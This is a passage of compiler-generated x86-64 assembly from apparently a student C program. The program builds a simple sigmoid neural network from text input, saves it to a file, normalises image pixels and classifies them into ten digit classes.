LBB3_8: ## in Loop: Header=BB3_5 Depth=1
jmp LBB3_9
LBB3_9: ## in Loop: Header=BB3_5 Depth=1
movl -48(%rbp), %eax
addl $1, %eax
movl %eax, -48(%rbp)
jmp LBB3_5
LBB3_10:
leaq L_.str.2(%rip), %rax
movq %rax, -56(%rbp)
movq -32(%rbp), %rdi
movq -56(%rbp), %rsi
callq _strtok
movq %rax, -64(%rbp)
LBB3_11: ## =>This Loop Header: Depth=1
## Child Loop BB3_15 Depth 2
## Child Loop BB3_19 Depth 2
## Child Loop BB3_21 Depth 3
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq $0, -64(%rbp)
movb %al, -81(%rbp) ## 1-byte Spill
je LBB3_13
## %bb.12: ## in Loop: Header=BB3_11 Depth=1
cmpl $0, -44(%rbp)
setg %al
movb %al, -81(%rbp) ## 1-byte Spill
LBB3_13: ## in Loop: Header=BB3_11 Depth=1
movb -81(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB3_14
jmp LBB3_27
LBB3_14: ## in Loop: Header=BB3_11 Depth=1
movl -44(%rbp), %eax
addl $-1, %eax
movl %eax, -44(%rbp)
movl $0, -68(%rbp)
movl $0, -72(%rbp)
movl $32, %edi
callq _malloc
movq %rax, -80(%rbp)
movq -64(%rbp), %rdi
callq _atoi
movl %eax, %ecx
movq -80(%rbp), %rax
movl %ecx, 16(%rax)
movq -56(%rbp), %rsi
xorl %eax, %eax
movl %eax, %edi
callq _strtok
movq %rax, -64(%rbp)
movq -64(%rbp), %rdi
callq _atoi
movl %eax, %ecx
movq -80(%rbp), %rax
movl %ecx, 20(%rax)
movq -80(%rbp), %rax
movslq 16(%rax), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -80(%rbp), %rax
movq %rcx, (%rax)
movq -80(%rbp), %rax
movslq 20(%rax), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -80(%rbp), %rax
movq %rcx, 8(%rax)
movq -80(%rbp), %rax
movslq 20(%rax), %rdi
movl $48, %esi
callq _calloc
movq %rax, %rcx
movq -80(%rbp), %rax
movq %rcx, 24(%rax)
movl $0, -72(%rbp)
LBB3_15: ## Parent Loop BB3_11 Depth=1
## => This Inner Loop Header: Depth=2
movl -72(%rbp), %eax
movq -80(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB3_18
## %bb.16: ## in Loop: Header=BB3_15 Depth=2
movq -80(%rbp), %rax
movslq 16(%rax), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -80(%rbp), %rax
movq 24(%rax), %rax
movslq -72(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movq %rcx, 16(%rax)
movq -80(%rbp), %rax
movslq 16(%rax), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -80(%rbp), %rax
movq 24(%rax), %rax
movslq -72(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movq %rcx, 40(%rax)
## %bb.17: ## in Loop: Header=BB3_15 Depth=2
movl -72(%rbp), %eax
addl $1, %eax
movl %eax, -72(%rbp)
jmp LBB3_15
LBB3_18: ## in Loop: Header=BB3_11 Depth=1
movl $0, -72(%rbp)
LBB3_19: ## Parent Loop BB3_11 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB3_21 Depth 3
movl -72(%rbp), %eax
movq -80(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB3_26
## %bb.20: ## in Loop: Header=BB3_19 Depth=2
movl -44(%rbp), %eax
addl $-1, %eax
movl %eax, -44(%rbp)
movq -56(%rbp), %rsi
xorl %eax, %eax
movl %eax, %edi
callq _strtok
movq %rax, -64(%rbp)
movq -64(%rbp), %rdi
callq _atof
movq -80(%rbp), %rax
movq 24(%rax), %rax
movslq -72(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd %xmm0, 8(%rax)
movq -80(%rbp), %rax
movl 16(%rax), %ecx
movq -80(%rbp), %rax
movq 24(%rax), %rax
movslq -72(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movl %ecx, (%rax)
movl $0, -68(%rbp)
LBB3_21: ## Parent Loop BB3_11 Depth=1
## Parent Loop BB3_19 Depth=2
## => This Inner Loop Header: Depth=3
movl -68(%rbp), %eax
movq -80(%rbp), %rcx
cmpl 16(%rcx), %eax
jge LBB3_24
## %bb.22: ## in Loop: Header=BB3_21 Depth=3
movq -56(%rbp), %rsi
xorl %eax, %eax
movl %eax, %edi
callq _strtok
movq %rax, -64(%rbp)
movq -64(%rbp), %rdi
callq _atof
movq -80(%rbp), %rax
movq 24(%rax), %rax
movslq -72(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -68(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.23: ## in Loop: Header=BB3_21 Depth=3
movl -68(%rbp), %eax
addl $1, %eax
movl %eax, -68(%rbp)
jmp LBB3_21
LBB3_24: ## in Loop: Header=BB3_19 Depth=2
jmp LBB3_25
LBB3_25: ## in Loop: Header=BB3_19 Depth=2
movl -72(%rbp), %eax
addl $1, %eax
movl %eax, -72(%rbp)
jmp LBB3_19
LBB3_26: ## in Loop: Header=BB3_11 Depth=1
movq -8(%rbp), %rdi
movq -80(%rbp), %rsi
callq _addLayerToNetwork
movq -56(%rbp), %rsi
xorl %eax, %eax
movl %eax, %edi
callq _strtok
movq %rax, -64(%rbp)
jmp LBB3_11
LBB3_27:
movq -32(%rbp), %rdi
callq _free
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _addLayerToNetwork ## -- Begin function addLayerToNetwork
.p2align 4, 0x90
_addLayerToNetwork: ## @addLayerToNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rdi
callq _initNOEUD
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq $0, 8(%rax)
movq -8(%rbp), %rax
movq 16(%rax), %rcx
movq -24(%rbp), %rax
movq %rcx, 16(%rax)
movq -8(%rbp), %rax
cmpl $0, (%rax)
jle LBB4_2
## %bb.1:
movq -24(%rbp), %rcx
movq -8(%rbp), %rax
movq 16(%rax), %rax
movq %rcx, 8(%rax)
movq -24(%rbp), %rax
movq 16(%rax), %rax
movq (%rax), %rax
movl 20(%rax), %ecx
movq -24(%rbp), %rax
movq (%rax), %rax
movl %ecx, 16(%rax)
jmp LBB4_3
LBB4_2:
movq -24(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
LBB4_3:
movq -24(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 16(%rax)
movq -8(%rbp), %rax
movl (%rax), %ecx
addl $1, %ecx
movl %ecx, (%rax)
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _initNOEUD ## -- Begin function initNOEUD
.p2align 4, 0x90
_initNOEUD: ## @initNOEUD
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl $24, %edi
callq _malloc
movq %rax, -16(%rbp)
movl $32, %edi
callq _malloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq %rcx, (%rax)
movq -8(%rbp), %rax
movslq 16(%rax), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq (%rax), %rax
movq %rcx, (%rax)
movq -8(%rbp), %rax
movslq 20(%rax), %rdi
shlq $3, %rdi
callq _malloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq (%rax), %rax
movq %rcx, 8(%rax)
movq -8(%rbp), %rax
movslq 20(%rax), %rax
imulq $48, %rax, %rdi
callq _malloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq (%rax), %rax
movq %rcx, 24(%rax)
movl $0, -20(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
movl -20(%rbp), %eax
movq -8(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB5_4
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movslq (%rax), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movq %rcx, 16(%rax)
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movslq (%rax), %rdi
movl $8, %esi
callq _calloc
movq %rax, %rcx
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -20(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movq %rcx, 40(%rax)
## %bb.3: ## in Loop: Header=BB5_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB5_1
LBB5_4:
movl $0, -24(%rbp)
LBB5_5: ## =>This Loop Header: Depth=1
## Child Loop BB5_7 Depth 2
movl -24(%rbp), %eax
movq -8(%rbp), %rcx
cmpl 20(%rcx), %eax
jge LBB5_12
## %bb.6: ## in Loop: Header=BB5_5 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd %xmm0, 8(%rax)
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 32(%rax), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd %xmm0, 32(%rax)
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 24(%rax), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd %xmm0, 24(%rax)
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movl (%rax), %ecx
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rax
movl %ecx, (%rax)
movl $0, -28(%rbp)
LBB5_7: ## Parent Loop BB5_5 Depth=1
## => This Inner Loop Header: Depth=2
movl -28(%rbp), %eax
movq -8(%rbp), %rcx
movq 24(%rcx), %rcx
movslq -24(%rbp), %rdx
imulq $48, %rdx, %rdx
addq %rdx, %rcx
cmpl (%rcx), %eax
jge LBB5_10
## %bb.8: ## in Loop: Header=BB5_7 Depth=2
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -28(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -28(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 40(%rax), %rax
movslq -28(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -24(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 40(%rax), %rax
movslq -28(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.9: ## in Loop: Header=BB5_7 Depth=2
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB5_7
LBB5_10: ## in Loop: Header=BB5_5 Depth=1
movq -8(%rbp), %rax
movq 8(%rax), %rax
movslq -24(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq 8(%rax), %rax
movslq -24(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.11: ## in Loop: Header=BB5_5 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB5_5
LBB5_12:
movl $0, -32(%rbp)
LBB5_13: ## =>This Inner Loop Header: Depth=1
movl -32(%rbp), %eax
movq -8(%rbp), %rcx
cmpl 16(%rcx), %eax
jge LBB5_16
## %bb.14: ## in Loop: Header=BB5_13 Depth=1
movq -8(%rbp), %rax
movq (%rax), %rax
movslq -32(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movq (%rax), %rax
movq (%rax), %rax
movslq -32(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.15: ## in Loop: Header=BB5_13 Depth=1
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB5_13
LBB5_16:
movq -8(%rbp), %rax
movl 16(%rax), %ecx
movq -16(%rbp), %rax
movq (%rax), %rax
movl %ecx, 16(%rax)
movq -8(%rbp), %rax
movl 20(%rax), %ecx
movq -16(%rbp), %rax
movq (%rax), %rax
movl %ecx, 20(%rax)
movq -16(%rbp), %rax
movq $0, 8(%rax)
movq -16(%rbp), %rax
movq $0, 16(%rax)
movq -16(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _estVideNetwork ## -- Begin function estVideNetwork
.p2align 4, 0x90
_estVideNetwork: ## @estVideNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
cmpq $0, 8(%rax)
sete %al
andb $1, %al
movzbl %al, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _VerificationReseau ## -- Begin function VerificationReseau
.p2align 4, 0x90
_VerificationReseau: ## @VerificationReseau
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rdi
leaq L_.str.3(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB7_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.4(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB7_2:
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
movl $0, -44(%rbp)
LBB7_3: ## =>This Loop Header: Depth=1
## Child Loop BB7_5 Depth 2
## Child Loop BB7_7 Depth 3
movl -44(%rbp), %eax
movq -8(%rbp), %rcx
cmpl (%rcx), %eax
jge LBB7_14
## %bb.4: ## in Loop: Header=BB7_3 Depth=1
movq -24(%rbp), %rdi
movq -40(%rbp), %rax
movq (%rax), %rax
movl 16(%rax), %edx
movq -40(%rbp), %rax
movq (%rax), %rax
movl 20(%rax), %ecx
leaq L_.str.5(%rip), %rsi
movb $0, %al
callq _fprintf
movl $0, -48(%rbp)
LBB7_5: ## Parent Loop BB7_3 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB7_7 Depth 3
movl -48(%rbp), %eax
movq -40(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB7_12
## %bb.6: ## in Loop: Header=BB7_5 Depth=2
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -48(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movl (%rax), %eax
movl %eax, -28(%rbp)
movq -24(%rbp), %rdi
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -48(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.6(%rip), %rsi
movb $1, %al
callq _fprintf
movl $0, -52(%rbp)
LBB7_7: ## Parent Loop BB7_3 Depth=1
## Parent Loop BB7_5 Depth=2
## => This Inner Loop Header: Depth=3
movl -52(%rbp), %eax
movl -28(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
jge LBB7_10
## %bb.8: ## in Loop: Header=BB7_7 Depth=3
movq -24(%rbp), %rdi
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -48(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -52(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.6(%rip), %rsi
movb $1, %al
callq _fprintf
## %bb.9: ## in Loop: Header=BB7_7 Depth=3
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB7_7
LBB7_10: ## in Loop: Header=BB7_5 Depth=2
movq -24(%rbp), %rdi
movq -40(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -48(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movl -28(%rbp), %ecx
subl $1, %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.7(%rip), %rsi
movb $1, %al
callq _fprintf
## %bb.11: ## in Loop: Header=BB7_5 Depth=2
movl -48(%rbp), %eax
addl $1, %eax
movl %eax, -48(%rbp)
jmp LBB7_5
LBB7_12: ## in Loop: Header=BB7_3 Depth=1
movq -40(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
## %bb.13: ## in Loop: Header=BB7_3 Depth=1
movl -44(%rbp), %eax
addl $1, %eax
movl %eax, -44(%rbp)
jmp LBB7_3
LBB7_14:
movq -24(%rbp), %rdi
callq _fclose
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function evalNetwork
LCPI8_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _evalNetwork
.p2align 4, 0x90
_evalNetwork: ## @evalNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -24(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -32(%rbp)
movl $0, -36(%rbp)
movq $0, -48(%rbp)
movl $0, -52(%rbp)
LBB8_1: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
movq -8(%rbp), %rcx
movq 8(%rcx), %rcx
movq (%rcx), %rcx
cmpl 16(%rcx), %eax
jge LBB8_4
## %bb.2: ## in Loop: Header=BB8_1 Depth=1
movq -16(%rbp), %rax
movslq -52(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq (%rax), %rax
movq (%rax), %rax
movslq -52(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB8_1 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB8_1
LBB8_4:
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -48(%rbp)
movl $0, -36(%rbp)
LBB8_5: ## =>This Loop Header: Depth=1
## Child Loop BB8_7 Depth 2
## Child Loop BB8_9 Depth 3
## Child Loop BB8_16 Depth 2
movl -36(%rbp), %eax
movq -8(%rbp), %rcx
cmpl (%rcx), %eax
jge LBB8_24
## %bb.6: ## in Loop: Header=BB8_5 Depth=1
movl $0, -56(%rbp)
LBB8_7: ## Parent Loop BB8_5 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB8_9 Depth 3
movl -56(%rbp), %eax
movq -48(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB8_14
## %bb.8: ## in Loop: Header=BB8_7 Depth=2
movq -48(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -56(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movsd 8(%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
movl $0, -60(%rbp)
LBB8_9: ## Parent Loop BB8_5 Depth=1
## Parent Loop BB8_7 Depth=2
## => This Inner Loop Header: Depth=3
movl -60(%rbp), %eax
movq -48(%rbp), %rcx
movq (%rcx), %rcx
cmpl 16(%rcx), %eax
jge LBB8_12
## %bb.10: ## in Loop: Header=BB8_9 Depth=3
movq -48(%rbp), %rax
movq (%rax), %rax
movq (%rax), %rax
movslq -60(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -48(%rbp), %rax
movq (%rax), %rax
movq 24(%rax), %rax
movslq -56(%rbp), %rcx
imulq $48, %rcx, %rcx
addq %rcx, %rax
movq 16(%rax), %rax
movslq -60(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
movsd -24(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -24(%rbp)
## %bb.11: ## in Loop: Header=BB8_9 Depth=3
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB8_9
LBB8_12: ## in Loop: Header=BB8_7 Depth=2
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq %xmm0, %rax
movabsq $-9223372036854775808, %rcx ## imm = 0x8000000000000000
xorq %rcx, %rax
movq %rax, %xmm0
callq _exp
movsd LCPI8_0(%rip), %xmm1 ## xmm1 = mem[0],zero
addsd %xmm0, %xmm1
movsd LCPI8_0(%rip), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -32(%rbp)
movsd -32(%rbp), %xmm0 ## xmm0 = mem[0],zero
movq -48(%rbp), %rax
movq (%rax), %rax
movq 8(%rax), %rax
movslq -56(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.13: ## in Loop: Header=BB8_7 Depth=2
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB8_7
LBB8_14: ## in Loop: Header=BB8_5 Depth=1
movq -48(%rbp), %rax
cmpq $0, 8(%rax)
je LBB8_20
## %bb.15: ## in Loop: Header=BB8_5 Depth=1
movl $0, -64(%rbp)
LBB8_16: ## Parent Loop BB8_5 Depth=1
## => This Inner Loop Header: Depth=2
movl -64(%rbp), %eax
movq -48(%rbp), %rcx
movq (%rcx), %rcx
cmpl 20(%rcx), %eax
jge LBB8_19
## %bb.17: ## in Loop: Header=BB8_16 Depth=2
movq -48(%rbp), %rax
movq (%rax), %rax
movq 8(%rax), %rax
movslq -64(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movq -48(%rbp), %rax
movq 8(%rax), %rax
movq (%rax), %rax
movq (%rax), %rax
movslq -64(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.18: ## in Loop: Header=BB8_16 Depth=2
movl -64(%rbp), %eax
addl $1, %eax
movl %eax, -64(%rbp)
jmp LBB8_16
LBB8_19: ## in Loop: Header=BB8_5 Depth=1
jmp LBB8_20
LBB8_20: ## in Loop: Header=BB8_5 Depth=1
movq -48(%rbp), %rax
cmpq $0, 8(%rax)
jne LBB8_22
## %bb.21:
jmp LBB8_24
LBB8_22: ## in Loop: Header=BB8_5 Depth=1
movq -48(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -48(%rbp)
## %bb.23: ## in Loop: Header=BB8_5 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB8_5
LBB8_24:
movq -48(%rbp), %rax
movq (%rax), %rax
movq 8(%rax), %rax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _imgClass ## -- Begin function imgClass
.p2align 4, 0x90
_imgClass: ## @imgClass
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -24(%rbp)
movl $0, -28(%rbp)
LBB9_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -28(%rbp)
jge LBB9_6
## %bb.2: ## in Loop: Header=BB9_1 Depth=1
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
ucomisd -24(%rbp), %xmm0
jbe LBB9_4
## %bb.3: ## in Loop: Header=BB9_1 Depth=1
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
movl -28(%rbp), %eax
movl %eax, -12(%rbp)
LBB9_4: ## in Loop: Header=BB9_1 Depth=1
jmp LBB9_5
LBB9_5: ## in Loop: Header=BB9_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB9_1
LBB9_6:
movl -12(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function imgNormalisation
LCPI10_0:
.quad 0x406fe00000000000 ## double 255
.section __TEXT,__text,regular,pure_instructions
.globl _imgNormalisation
.p2align 4, 0x90
_imgNormalisation: ## @imgNormalisation
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movslq -12(%rbp), %rdi
movl $8, %esi
callq _calloc
movq %rax, -24(%rbp)
movl $0, -28(%rbp)
LBB10_1: ## =>This Inner Loop Header: Depth=1
movl -28(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB10_4
## %bb.2: ## in Loop: Header=BB10_1 Depth=1
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
cvtsi2sdl (%rax,%rcx,4), %xmm0
movsd LCPI10_0(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movq -24(%rbp), %rax
movslq -28(%rbp), %rcx
movsd %xmm0, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB10_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB10_1
LBB10_4:
movq -24(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _loadcsv ## -- Begin function loadcsv
.p2align 4, 0x90
_loadcsv: ## @loadcsv
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl %edi, -4(%rbp)
movq %rsi, -16(%rbp)
movq $0, -24(%rbp)
movl -4(%rbp), %esi
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
cmpl $4, -4(%rbp)
jne LBB11_13
## %bb.1:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
leaq L_.str.9(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB11_13
## %bb.2:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.10(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB11_6
## %bb.3:
movq -16(%rbp), %rax
movq 24(%rax), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB11_5
## %bb.4:
movq -16(%rbp), %rax
movq 24(%rax), %rsi
leaq L_.str.12(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB11_5:
jmp LBB11_12
LBB11_6:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.13(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB11_10
## %bb.7:
movq -16(%rbp), %rax
movq 24(%rax), %rdi
